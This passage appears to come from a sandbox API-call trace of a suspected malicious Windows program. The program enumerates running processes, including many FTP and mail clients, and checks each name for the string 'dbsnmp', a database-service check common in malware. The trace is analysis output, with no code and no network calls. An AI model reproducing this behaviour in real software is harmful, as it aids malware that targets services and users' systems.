WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.935] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3566480 [0092.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3566480, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0092.935] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0092.935] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="dbsnmp") returned 0x0 [0092.935] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0092.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.937] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3543c10 [0092.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3543c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0092.937] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0092.937] StrStrIA (lpFirst="powell_jane.exe", lpSrch="dbsnmp") returned 0x0 [0092.937] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0092.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.938] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35432f8 [0092.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x35432f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0092.938] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0092.938] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="dbsnmp") returned 0x0 [0092.938] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0092.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.939] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3543e20 [0092.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3543e20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0092.940] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0092.940] StrStrIA (lpFirst="gainedshape.exe", lpSrch="dbsnmp") returned 0x0 [0092.940] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0092.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.941] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3543518 [0092.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3543518, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0092.941] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0092.941] StrStrIA (lpFirst="opens-versions.exe", lpSrch="dbsnmp") returned 0x0 [0092.941] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0092.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0092.943] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566778 [0092.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3566778, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0092.943] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0092.943] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="dbsnmp") returned 0x0 [0092.943] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0092.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.944] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543ce8 [0092.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543ce8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.944] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0092.944] StrStrIA (lpFirst="3dftp.exe", lpSrch="dbsnmp") returned 0x0 [0092.944] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0092.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.946] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3543358 [0092.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3543358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0092.946] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0092.946] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="dbsnmp") returned 0x0 [0092.946] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0092.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.947] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543d18 [0092.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543d18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.947] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0092.947] StrStrIA (lpFirst="alftp.exe", lpSrch="dbsnmp") returned 0x0 [0092.947] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0092.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.949] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543bf8 [0092.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3543bf8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0092.949] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0092.949] StrStrIA (lpFirst="barca.exe", lpSrch="dbsnmp") returned 0x0 [0092.949] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0092.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.950] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543d78 [0092.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3543d78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0092.950] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0092.950] StrStrIA (lpFirst="bitkinex.exe", lpSrch="dbsnmp") returned 0x0 [0092.950] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0092.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.951] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543c40 [0092.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543c40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0092.951] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0092.951] StrStrIA (lpFirst="coreftp.exe", lpSrch="dbsnmp") returned 0x0 [0092.952] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0092.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.953] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547798 [0092.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3547798, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0092.953] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0092.953] StrStrIA (lpFirst="far.exe", lpSrch="dbsnmp") returned 0x0 [0092.953] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0092.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.954] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3543c28 [0092.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3543c28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0092.954] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0092.954] StrStrIA (lpFirst="filezilla.exe", lpSrch="dbsnmp") returned 0x0 [0092.954] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0092.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.957] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543d30 [0092.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3543d30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.958] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0092.958] StrStrIA (lpFirst="flashfxp.exe", lpSrch="dbsnmp") returned 0x0 [0092.958] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0092.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.959] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543c58 [0092.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3543c58, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0092.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0092.959] StrStrIA (lpFirst="fling.exe", lpSrch="dbsnmp") returned 0x0 [0092.959] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0092.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.960] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3543398 [0092.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3543398, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0092.960] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0092.960] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="dbsnmp") returned 0x0 [0092.960] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0092.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.962] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3567390 [0092.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3567390, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0092.962] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0092.962] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="dbsnmp") returned 0x0 [0092.962] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0092.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.963] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35476d8 [0092.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35476d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0092.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0092.963] StrStrIA (lpFirst="icq.exe", lpSrch="dbsnmp") returned 0x0 [0092.963] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0092.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.964] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3543d60 [0092.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543d60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.964] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0092.964] StrStrIA (lpFirst="leechftp.exe", lpSrch="dbsnmp") returned 0x0 [0092.965] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0092.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.966] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3543c88 [0092.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3543c88, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0092.966] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0092.966] StrStrIA (lpFirst="ncftp.exe", lpSrch="dbsnmp") returned 0x0 [0092.966] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0092.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.967] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3543ca0 [0092.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3543ca0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0092.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0092.967] StrStrIA (lpFirst="notepad.exe", lpSrch="dbsnmp") returned 0x0 [0092.967] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0092.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.968] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3543d90 [0092.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3543d90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0092.968] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0092.969] StrStrIA (lpFirst="operamail.exe", lpSrch="dbsnmp") returned 0x0 [0092.969] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: 